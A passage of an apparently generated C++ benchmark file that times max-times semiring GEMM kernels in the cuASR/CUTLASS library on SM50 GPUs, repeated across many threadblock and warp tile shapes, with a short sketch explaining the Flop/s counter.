EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 1 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2(benchmark::State &state) { const auto N = 
static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 32 x 32 x 8 #if 
defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif 
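////////////////////////////////////////////////////////////////////////////////
// Sketch (not part of the generated sources): every benchmark in this file
// reports throughput the same way. flops_per_itr = 2 * N * N * N models one
// multiply and one add per inner-product term of an N x N x N GEMM, and
// benchmark::Counter::kIsIterationInvariantRate tells Google Benchmark to
// multiply that per-iteration value by the iteration count and divide by the
// measured time, which produces the "Flop/s" column. The stand-alone example
// below shows the same reporting pattern on a placeholder workload; do_work()
// and the benchmark name are illustrative only.
#include "benchmark/benchmark.h"

static double do_work(int n) {  // stand-in for bench.run()
  double acc = 0.0;
  for (int i = 0; i < n; ++i) acc += static_cast<double>(i);
  return acc;
}

static void BM_flops_counter_sketch(benchmark::State &state) {
  const auto N = static_cast<int>(state.range(0));
  for (auto _ : state) {
    benchmark::DoNotOptimize(do_work(N));
  }
  // Same cost model as the generated benchmarks: 2*N^3 flops per iteration.
  double flops_per_itr = 2.0 * N * N * N;
  state.counters["Flop/s"] =
      benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate);
}
BENCHMARK(BM_flops_counter_sketch)->RangeMultiplier(2)->Range(256, 4096);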
//////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, 
benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { 
benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // 
cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<64, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, 
cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; 
using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; 